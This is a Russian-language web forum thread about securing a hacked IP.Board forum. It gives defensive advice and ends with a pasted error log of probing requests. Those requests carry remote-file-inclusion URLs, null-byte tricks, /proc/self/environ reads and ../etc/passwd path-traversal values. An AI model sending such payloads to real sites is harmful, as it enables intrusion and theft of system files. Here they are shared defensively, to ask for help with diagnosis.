Jump to content
Дизайн и модификация IPS Community IPBSkinsBETA
Search In
  • More options...
Find results that contain...
Find results in...
Sign in to follow this  
Morty

Хакнули форум v3.1.4

Recommended Posts

Помогите пожалуйста защитится от хакинга.

Сосбтвенно адрес _http://help-icq.ru

Share this post


Link to post
Share on other sites

Дырки есть в любом проекте, так что самое первое и основное что можно и нужно сделать - это поменять путь к админке, и защитить ее методом .htpasswd

Share this post


Link to post
Share on other sites

Помогите пожалуйста защитится от хакинга.

Использовать нормальный хостинг.

Не использовать нуленные программы. Если в непонятно откуда скачанных DLE или в IP.Board - е уже предусмотрен черный ход, то не защитится уже не чем.

Хуки скачивать только с официальных сайтов. Взломов через хуки еще не видел, но возможность вполне вероятная.

Ну естественно следить за обновлением используемых официальных программ.

 

И все.

 

Сломать нормальный пропаченный IP.Board очень сложно.

Share this post


Link to post
Share on other sites

Дырки есть в любом проекте, так что самое первое и основное что можно и нужно сделать - это поменять путь к админке, и защитить ее методом .htpasswd

Можно подробнее про .htpasswd?

Share this post


Link to post
Share on other sites

Можно подробнее про .htpasswd

Auth - защита паролем - но мертвому припарка.

IPS после 2.3 про такую защиту забыла. Эффекта он нее не много.

 

Если форум дырявый, я прямыми запросами к базе данных его положу, без захода в АЦ.

Если хостер дырявый, то .htpasswd и .htacces стираются без проблем.

Если взлом по ftp, то в АЦ заходов не бывает.

Share this post


Link to post
Share on other sites

Auth - защита паролем - но мертвому припарка.

IPS после 2.3 про такую защиту забыла. Эффекта он нее не много.

 

Если форум дырявый, я прямыми запросами к базе данных его положу, без захода в АЦ.

Если хостер дырявый, то .htpasswd и .htacces стираются без проблем.

Если взлом по ftp, то в АЦ заходов не бывает.

Вродебы там всё намного проще.

Я сейчас посмотрел логи входа в админку.

Походу тот кто напакостил узнал пароль админа (второго) и через его акк всё сделал.

Так как мой акк был удалён, а его нет.

так что админку защитить я считаю имеет смысл.

Share this post


Link to post
Share on other sites

Походу тот кто напакостил узнал пароль админа (второго) и через его акк всё сделал.

Узнать пароль к htpasswd так же можно.

 

Так как мой акк был удалён, а его нет.

так что админку защитить я считаю имеет смысл.

Это ложное ощущение безопасности. Но лишняя защита не когда не бывает лишней.

 

Хотя проще, ограничить по минимуму количество людей с доступом в АЦ.

Пароль должен быть реально сложный.

У админа "логин" и "отображаемое имя" никогда не должны совпадать.

 

Я не использую htpasswd.

 

Так как мой акк был удалён, а его нет.

А смысл его при взломе, было оставлять? Чтобы восстановить было проще?

Share this post


Link to post
Share on other sites

Всем спасибо.

Тему можно закрыть.

Share this post


Link to post
Share on other sites

Тема может пригодиться другим. Любая тема, где есть полезные советы.

Share this post


Link to post
Share on other sites

Я ведь не сказал "тему можно удалить".

Тема ведь останется. А если у кого-то будет похожий вопрос то создаст новую...

Share this post


Link to post
Share on other sites

И еще раз писать то же самое. Добрые ...

Share this post


Link to post
Share on other sites

Самое неприятное в любом взломе - это не факт самого взлома, а неизвестность:

- Кто и как именно взломал?

- Какой уровень доступа получил?

- С какой целью?

- Что именно и в каком количестве сделано?

- Не оставлено ли закладок "на будущее"?

 

Не найдя точные достоверные ответы, нельзя гарантировать, что взлом не повторится вновь. Если хотя бы на один из вопросов ответа нет - проводить полный аудит безопасности всего и вся, долго и основательно.

 

С сабжевого форума поржал.

Share this post


Link to post
Share on other sites

проводить полный аудит безопасности

Смысл? Если с самого начала была высокая вероятность закладки.

Share this post


Link to post
Share on other sites

А я и не про этот форум пишу. Топикстартер тут и не появится более, скорее всего, он же свою проблему "решил". А там у него - да, конечно, проверять смысла нет. Судя по всему, пиратская говносборка какого-то очередного "хакера", изначально напичканная левыми модами и правками. Да и сам форум такой форум - такая тематика, такой контент. В одной из тех с половиной тем, кажется, сам админ выкладывает т.н. "пинч" - генератор трояна, ворующего cookies, причем выкладывает в бинарном виде. Думаю, вы все понимаете и относительно форума, и относительно методики "взлома"? Тут и "закаладки" не нужны, с такими админами))

Share this post


Link to post
Share on other sites

День добрый. Сегодня ночью посыпались ошибки следующего вида. Кто-то очень хотел найти какую-то уязвимость или что-то еще? Что за параметр "k"? Кто может прокомментировать? Спасибо.

 

Выдержки из лога. Всего было 108 строк. Полный лог во вложении.

 

 

log_id log_member log_date log_error log_error_code log_ip_address log_request_uri

18 0 1301948884 Очистить cookies не удалось. Ссылка «Очистить cookies» имеет неверный формат. Пожалуйста, вернитесь назад и попробуйте еще раз.<br /><br /> 2010 84.20.133.65 /index.php?app=core&module=global&section=login&do=deleteCookies&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif?

19 0 1301948886 Очистить cookies не удалось. Ссылка «Очистить cookies» имеет неверный формат. Пожалуйста, вернитесь назад и попробуйте еще раз.<br /><br /> 2010 84.20.133.65 /index.php?app=core&module=global&section=login&do=deleteCookies&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif%00

20 0 1301948886 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=unlockStatus&status_id=32&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif?

21 0 1301948888 Очистить cookies не удалось. Ссылка «Очистить cookies» имеет неверный формат. Пожалуйста, вернитесь назад и попробуйте еще раз.<br /><br /> 2010 84.20.133.65 /index.php?app=core&module=global&section=login&do=deleteCookies&k=/proc/self/environ

22 0 1301948888 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=unlockStatus&status_id=32&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif%00

23 0 1301948888 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=lockStatus&status_id=32&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif?

24 0 1301948889 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=unlockStatus&status_id=30&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif?

25 0 1301948889 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=lockStatus&status_id=30&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif?

26 0 1301948890 Очистить cookies не удалось. Ссылка «Очистить cookies» имеет неверный формат. Пожалуйста, вернитесь назад и попробуйте еще раз.<br /><br /> 2010 84.20.133.65 /index.php?app=core&module=global&section=login&do=deleteCookies&k=/proc/self/environ%00

27 0 1301948890 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=unlockStatus&status_id=32&k=/proc/self/environ

28 0 1301948890 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=lockStatus&status_id=32&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif%00

29 0 1301948891 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=unlockStatus&status_id=30&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif%00

30 0 1301948891 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=lockStatus&status_id=30&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif%00

31 0 1301948891 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=unlockStatus&status_id=32&k=/proc/self/environ%00

32 0 1301948892 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=lockStatus&status_id=30&k=/proc/self/environ

33 0 1301948892 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=unlockStatus&status_id=28&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif?

 

...

 

123 0 1301948950 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=unlockStatus&status_id=32&k=/../../../../../../../../../../etc/passwd

124 0 1301948952 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=unlockStatus&status_id=32&k=../../../../../../../../../../etc/passwd%00

125 0 1301948954 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=unlockStatus&status_id=32&k=/../../../../../../../../../../etc/passwd%00

error_logs.rar

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...